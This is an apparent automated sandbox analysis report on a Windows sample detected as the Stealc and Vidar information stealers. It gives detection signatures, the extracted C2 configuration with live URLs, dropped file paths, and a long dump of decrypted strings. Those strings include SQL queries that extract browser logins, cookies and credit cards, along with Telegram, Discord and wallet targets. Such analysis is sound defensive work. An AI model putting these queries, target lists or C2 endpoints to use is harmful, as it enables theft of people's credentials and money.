Windows Analysis Report
v7942.exe

Overview

General Information

Sample name: v7942.exe
Analysis ID: 1639385
MD5: b6fff0854975fdd3a69fd2442672de42
SHA1: 301241ad8d04a29bec6d43e00b605df4317f406a
SHA256: fe0d2c8f9e42e9672c51e3f1d478f9398fe88c6f31f83cadbb07d3bb064753c6
Tags: exevidaruser-aachum
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates / moves files in alternative data streams (ADS)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve many domain names, but no domain seems valid
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://77.90.153.241/612acd258782ade8.phpition: Avira URL Cloud: Label: malware
Source: http://77.90.153.241/a07daa7aeaf96e14/sqlite3.dll Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\ProgramData\xlng4w479r.exe Avira: detection malicious, Label: TR/AD.Nekark.vsdpm
Found malware configuration
Source: 32.2.MSBuild.exe.400000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://77.90.153.241/612acd258782ade8.php", "Botnet": "default"}
Source: 3.2.MSBuild.exe.400000.0.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199832267488", "Botnet": "dqu220"}
Multi AV Scanner detection for dropped file
Source: :cat (copy) ReversingLabs: Detection: 72%
Source: C:\ProgramData\ph4eu37qie.exe ReversingLabs: Detection: 47%
Source: C:\ProgramData\xlng4w479r.exe ReversingLabs: Detection: 72%
Source: C:\ProgramData\zmgdjecba1.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\s9471[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sss81242[1].exe ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\l9543[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\4mfMnLLX\EJNNjjms8tHlPaG5.exe ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: v7942.exe Virustotal: Detection: 49% Perma Link
Source: v7942.exe ReversingLabs: Detection: 55%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 14
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 04
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 20
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: 25
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: lstrcatA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: OpenEventA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateEventA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CloseHandle
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Sleep
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: VirtualFree
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: lstrlenA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ExitProcess
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: user32.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateDCA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sscanf
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HAL9TH
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: JohnDoe
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DISPLAY
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: http://77.90.153.241
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: /612acd258782ade8.php
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: /a07daa7aeaf96e14/
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: default
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HeapFree
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetFileSize
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GlobalSize
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Process32Next
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Process32First
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: LocalFree
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: FindClose
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ReadFile
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: WriteFile
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateFileA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CopyFileA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetLastError
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GlobalFree
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: OpenProcess
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ole32.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: wininet.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: shell32.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SelectObject
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BitBlt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DeleteObject
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GdipFree
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CoInitialize
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetDC
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CloseWindow
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: wsprintfA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CharToOemW
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: wsprintfW
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: StrStrA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RmStartSession
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RmGetList
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: RmEndSession
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: encrypted_key
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: PATH
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: NSS_Init
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: browser:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: profile:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: url:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: login:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: password:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Opera
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: OperaGX
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Network
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: cookies
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: .txt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: TRUE
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: FALSE
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: autofill
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: history
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: cc
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: name:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: month:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: year:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: card:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Cookies
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Login Data
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Web Data
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: History
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: logins.json
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: usernameField
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: guid
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: places.sqlite
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: plugins
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: IndexedDB
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Opera Stable
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: CURRENT
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Local State
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: profiles.ini
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: chrome
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: opera
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: firefox
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: wallets
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: ProductName
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: x32
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: x64
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DisplayName
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Network Info:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: System Summary:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - HWID:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - OS:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Architecture:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - UserName:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Local Time:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - UTC:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Language:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Laptop:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Running Path:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - CPU:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Threads:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Cores:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - RAM:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: - GPU:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: User Agents:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: All Users:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Current User:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Process List:
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: system_info.txt
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: nss3.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Temp\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: .exe
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: runas
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: open
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: /c start
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: %RECENT%
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: *.lnk
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: files
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \discord\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: key_datas
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: map*
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Telegram
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Tox
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: *.tox
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: *.ini
Source: 32.2.MSBuild.exe.400000.0.unpack String decryptor: Password
